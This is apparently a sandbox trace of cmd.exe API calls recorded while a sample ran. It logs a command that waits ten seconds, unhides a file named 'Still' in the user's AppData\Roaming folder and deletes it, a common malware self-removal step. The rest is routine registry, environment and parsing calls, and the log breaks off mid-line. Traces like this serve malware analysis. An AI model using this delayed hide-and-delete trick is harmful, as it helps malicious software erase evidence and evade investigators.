os_parent_pid = "0x704" cmd_line = "cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" & del \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 567 os_tid = 0x13d4 [0247.146] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0247.146] __set_app_type (_Type=0x1) [0247.146] __p__fmode () returned 0x776f3c14 [0247.146] __p__commode () returned 0x776f49ec [0247.146] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xaa6fd0) returned 0x0 [0247.146] __getmainargs (in: _Argc=0xabd1a4, _Argv=0xabd1a8, _Env=0xabd1ac, _DoWildCard=0, _StartInfo=0xabd1b8 | out: _Argc=0xabd1a4, _Argv=0xabd1a8, _Env=0xabd1ac) returned 0 [0247.147] _onexit (_Func=0xaa8030) returned 0xaa8030 [0247.147] _onexit (_Func=0xaa8040) returned 0xaa8040 [0247.147] _onexit (_Func=0xaa8050) returned 0xaa8050 [0247.147] _onexit (_Func=0xaa8060) returned 0xaa8060 [0247.147] _onexit (_Func=0xaa8070) returned 0xaa8070 [0247.148] _onexit (_Func=0xaa8080) returned 0xaa8080 [0247.149] GetCurrentThreadId () returned 0x13d4 [0247.149] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x13d4) returned 0x238 [0247.149] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0247.149] GetProcAddress (hModule=0x772d0000, lpProcName="SetThreadUILanguage") returned 0x772e4f70 [0247.150] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0247.419] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0247.419] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x5dfa68 | out: phkResult=0x5dfa68*=0x0) returned 0x2 [0247.419] VirtualQuery (in: lpAddress=0x5dfa73, lpBuffer=0x5dfa20, dwLength=0x1c | out: lpBuffer=0x5dfa20*(BaseAddress=0x5df000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0247.419] VirtualQuery (in: lpAddress=0x4e0000, lpBuffer=0x5dfa20, dwLength=0x1c | out: lpBuffer=0x5dfa20*(BaseAddress=0x4e0000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0247.419] VirtualQuery (in: lpAddress=0x4e1000, lpBuffer=0x5dfa20, dwLength=0x1c | out: lpBuffer=0x5dfa20*(BaseAddress=0x4e1000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0247.419] VirtualQuery (in: lpAddress=0x4e3000, lpBuffer=0x5dfa20, dwLength=0x1c | out: lpBuffer=0x5dfa20*(BaseAddress=0x4e3000, AllocationBase=0x4e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0247.419] VirtualQuery (in: lpAddress=0x5e0000, lpBuffer=0x5dfa20, dwLength=0x1c | out: lpBuffer=0x5dfa20*(BaseAddress=0x5e0000, AllocationBase=0x5e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0247.419] GetConsoleOutputCP () returned 0x1b5 [0247.863] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0247.863] SetConsoleCtrlHandler (HandlerRoutine=0xab7260, Add=1) returned 1 [0247.863] _get_osfhandle (_FileHandle=1) returned 0x90 [0247.863] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac388c | out: lpMode=0xac388c) returned 1 [0247.978] _get_osfhandle (_FileHandle=0) returned 0x8c [0247.978] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3888 | out: lpMode=0xac3888) returned 1 [0248.170] _get_osfhandle (_FileHandle=1) returned 0x90 [0248.170] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0248.317] _get_osfhandle (_FileHandle=1) returned 0x90 [0248.318] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xac3890 | out: lpMode=0xac3890) returned 1 [0248.459] _get_osfhandle (_FileHandle=1) returned 0x90 [0248.459] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0248.790] _get_osfhandle (_FileHandle=0) returned 0x8c [0248.790] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xac3894 | out: lpMode=0xac3894) returned 1 [0248.902] _get_osfhandle (_FileHandle=0) returned 0x8c [0248.902] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0249.234] GetEnvironmentStringsW () returned 0x2cb9bd0* [0249.235] GetProcessHeap () returned 0x2ca0000 [0249.235] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb12) returned 0x2cba6f0 [0249.235] FreeEnvironmentStringsA (penv="A") returned 1 [0249.235] GetProcessHeap () returned 0x2ca0000 [0249.235] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x4) returned 0x2cb5020 [0249.235] GetEnvironmentStringsW () returned 0x2cb9bd0* [0249.235] GetProcessHeap () returned 0x2ca0000 [0249.235] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb12) returned 0x2cbb210 [0249.235] FreeEnvironmentStringsA (penv="A") returned 1 [0249.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5de9c4 | out: phkResult=0x5de9c4*=0x240) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x0, lpData=0x5de9d0*=0x0, lpcbData=0x5de9c8*=0x1000) returned 0x2 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x1, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x0, lpData=0x5de9d0*=0x1, lpcbData=0x5de9c8*=0x1000) returned 0x2 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x0, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x40, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x40, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x0, lpData=0x5de9d0*=0x40, lpcbData=0x5de9c8*=0x1000) returned 0x2 [0249.236] RegCloseKey (hKey=0x240) returned 0x0 [0249.236] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x5de9c4 | out: phkResult=0x5de9c4*=0x240) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x0, lpData=0x5de9d0*=0x40, lpcbData=0x5de9c8*=0x1000) returned 0x2 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x1, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x0, lpData=0x5de9d0*=0x1, lpcbData=0x5de9c8*=0x1000) returned 0x2 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x0, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x9, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x4, lpData=0x5de9d0*=0x9, lpcbData=0x5de9c8*=0x4) returned 0x0 [0249.236] RegQueryValueExW (in: hKey=0x240, lpValueName="AutoRun", lpReserved=0x0, lpType=0x5de9cc, lpData=0x5de9d0, lpcbData=0x5de9c8*=0x1000 | out: lpType=0x5de9cc*=0x0, lpData=0x5de9d0*=0x9, lpcbData=0x5de9c8*=0x1000) returned 0x2 [0249.237] RegCloseKey (hKey=0x240) returned 0x0 [0249.237] time (in: timer=0x0 | out: timer=0x0) returned 0x5ed59c31 [0249.237] srand (_Seed=0x5ed59c31) [0249.237] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" & del \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\"" [0249.237] malloc (_Size=0x4000) returned 0x982578 [0249.238] GetCommandLineW () returned="cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\" & del \"C:\\Users\\FD1HVy\\AppData\\Roaming\\Still\"" [0249.238] malloc (_Size=0xffce) returned 0x43b0048 [0249.239] ??_V@YAXPAX@Z () returned 0x5df9a8 [0249.240] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x43b0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.240] malloc (_Size=0xffce) returned 0x43c0020 [0249.241] ??_V@YAXPAX@Z () returned 0x5df77c [0249.242] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x43c0020, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0249.243] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0249.243] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0249.243] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0249.243] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0249.243] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0249.243] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0249.243] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0249.243] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0249.243] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0249.243] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0249.243] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0249.244] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0249.244] GetProcessHeap () returned 0x2ca0000 [0249.244] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cba6f0) returned 1 [0249.244] GetEnvironmentStringsW () returned 0x2cb9bd0* [0249.244] GetProcessHeap () returned 0x2ca0000 [0249.244] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb2a) returned 0x2cbc868 [0249.246] FreeEnvironmentStringsA (penv="A") returned 1 [0249.246] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0249.246] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xabf840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0249.246] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0249.246] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0249.246] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0249.246] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0249.246] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0249.246] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0249.246] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0249.246] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0249.246] malloc (_Size=0xffce) returned 0x43cfff8 [0249.247] ??_V@YAXPAX@Z () returned 0x5df514 [0249.247] GetProcessHeap () returned 0x2ca0000 [0249.247] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x38) returned 0x2cb7278 [0249.247] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x43cfff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.248] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x43cfff8, lpFilePart=0x5df560 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x5df560*="Desktop") returned 0x17 [0249.248] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.248] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x5df2e0 | out: lpFindFileData=0x5df2e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x2cb7538 [0249.249] FindClose (in: hFindFile=0x2cb7538 | out: hFindFile=0x2cb7538) returned 1 [0249.249] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x5df2e0 | out: lpFindFileData=0x5df2e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x17e9454d, ftLastAccessTime.dwHighDateTime=0x1d63874, ftLastWriteTime.dwLowDateTime=0x17e9454d, ftLastWriteTime.dwHighDateTime=0x1d63874, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x2cb7338 [0249.249] FindClose (in: hFindFile=0x2cb7338 | out: hFindFile=0x2cb7338) returned 1 [0249.249] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x5df2e0 | out: lpFindFileData=0x5df2e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x108af93a, ftLastAccessTime.dwHighDateTime=0x1d63874, ftLastWriteTime.dwLowDateTime=0x108af93a, ftLastWriteTime.dwHighDateTime=0x1d63874, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x2cb7338 [0249.249] FindClose (in: hFindFile=0x2cb7338 | out: hFindFile=0x2cb7338) returned 1 [0249.249] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0249.249] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0249.249] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0249.249] GetProcessHeap () returned 0x2ca0000 [0249.249] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cbc868) returned 1 [0249.250] GetEnvironmentStringsW () returned 0x2cb9bd0* [0249.250] GetProcessHeap () returned 0x2ca0000 [0249.250] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xb62) returned 0x2cbbd30 [0249.250] FreeEnvironmentStringsA (penv="=") returned 1 [0249.250] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x43b0048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0249.250] GetProcessHeap () returned 0x2ca0000 [0249.250] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cb7278) returned 1 [0249.250] ??_V@YAXPAX@Z () returned 0x1 [0249.250] ??_V@YAXPAX@Z () returned 0x1 [0249.250] GetProcessHeap () returned 0x2ca0000 [0249.250] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x400e) returned 0x2cbdf10 [0249.251] GetProcessHeap () returned 0x2ca0000 [0249.251] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0xf4) returned 0x2cbc8a0 [0249.251] GetProcessHeap () returned 0x2ca0000 [0249.251] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cbdf10) returned 1 [0249.251] GetConsoleOutputCP () returned 0x1b5 [0249.457] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac3850 | out: lpCPInfo=0xac3850) returned 1 [0249.457] GetUserDefaultLCID () returned 0x409 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xabf82c, cchData=8 | out: lpLCData=":") returned 2 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x5df8d0, cchData=128 | out: lpLCData="0") returned 2 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x5df8d0, cchData=128 | out: lpLCData="0") returned 2 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x5df8d0, cchData=128 | out: lpLCData="1") returned 2 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xabf81c, cchData=8 | out: lpLCData="/") returned 2 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xabf7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xabf778, cchData=32 | out: lpLCData="Tue") returned 4 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xabf738, cchData=32 | out: lpLCData="Wed") returned 4 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xabf6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xabf6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xabf678, cchData=32 | out: lpLCData="Sat") returned 4 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xabf638, cchData=32 | out: lpLCData="Sun") returned 4 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xabf80c, cchData=8 | out: lpLCData=".") returned 2 [0249.458] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xabf7f8, cchData=8 | out: lpLCData=",") returned 2 [0249.458] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0249.461] GetProcessHeap () returned 0x2ca0000 [0249.461] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x0, Size=0x20c) returned 0x2cbc9a0 [0249.461] GetConsoleTitleW (in: lpConsoleTitle=0x2cbc9a0, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0249.566] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x772d0000 [0249.567] GetProcAddress (hModule=0x772d0000, lpProcName="CopyFileExW") returned 0x772e4330 [0249.567] GetProcAddress (hModule=0x772d0000, lpProcName="IsDebuggerPresent") returned 0x772e5930 [0249.567] GetProcAddress (hModule=0x772d0000, lpProcName="SetConsoleInputExeNameW") returned 0x74d009d0 [0249.567] ??_V@YAXPAX@Z () returned 0x1 [0249.569] GetProcessHeap () returned 0x2ca0000 [0249.569] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x400a) returned 0x2cbdf10 [0249.569] GetProcessHeap () returned 0x2ca0000 [0249.569] RtlFreeHeap (HeapHandle=0x2ca0000, Flags=0x0, BaseAddress=0x2cbdf10) returned 1 [0249.570] _wcsicmp (_String1="choice", _String2=")") returned 58 [0249.570] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0249.570] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0249.570] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0249.570] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0249.570] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0249.570] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0249.570] GetProcessHeap () returned 0x2ca0000 [0249.570] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x58) returned 0x2cb2260 [0249.570] GetProcessHeap () returned 0x2ca0000 [0249.570] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x16) returned 0x2cb5968 [0249.571] GetProcessHeap () returned 0x2ca0000 [0249.571] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x22) returned 0x2cb4058 [0249.572] GetProcessHeap () returned 0x2ca0000 [0249.572] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x58) returned 0x2cb2920 [0249.572] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0249.572] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0249.573] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0249.573] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0249.573] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0249.573] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0249.573] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0249.573] GetProcessHeap () returned 0x2ca0000 [0249.573] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x58) returned 0x2cb2860 [0249.573] GetProcessHeap () returned 0x2ca0000 [0249.573] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x16) returned 0x2cb5a68 [0249.577] GetProcessHeap () returned 0x2ca0000 [0249.577] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x62) returned 0x2cae1d8 [0249.578] GetProcessHeap () returned 0x2ca0000 [0249.578] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x58) returned 0x2cb28c0 [0249.578] _wcsicmp (_String1="del", _String2=")") returned 59 [0249.579] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0249.579] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0249.579] _wcsicmp (_String1="IF", _String2="del") returned 5 [0249.579] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0249.579] _wcsicmp (_String1="REM", _String2="del") returned 14 [0249.579] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0249.579] GetProcessHeap () returned 0x2ca0000 [0249.579] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x58) returned 0x2cb2380 [0249.579] GetProcessHeap () returned 0x2ca0000 [0249.579] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x10) returned 0x2cb0de0 [0249.580] GetProcessHeap () returned 0x2ca0000 [0249.580] RtlAllocateHeap (HeapHandle=0x2ca0000, Flags=0x8, Size=0x5a) returned 0x2cae248 [0249.581] GetConsoleTitleW (in: lpConsoleTitle=0x5df768, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0249.937] malloc (_Size=0xffce) returned 0x43c2d58 [0249.937] ??_V@YAXPAX@Z () returned 0x5df4f4 [0249.938] malloc (_Size=0xffce) returned 0x43d2d30 [0249.939] ??_V@YAXPAX@Z () returned 0x5df2ac [0249.940] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0249.940] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0249.940] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0249.940] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0249.940] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0249.940] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0249.940] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0249.940] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0249.940] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0249.940] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0249.940] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0249.940] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0249.940] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0249.940] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0249.940] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0249.940] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0249.940] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0249.940] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0249.940] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0249.940] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0249.940] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0249.941] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0249.941] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0249.941] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0249.941] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0249.941] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0249.941] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0249.941] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0249.941] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0249.941] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0249.941] _wcsicmp (_String1="choice", 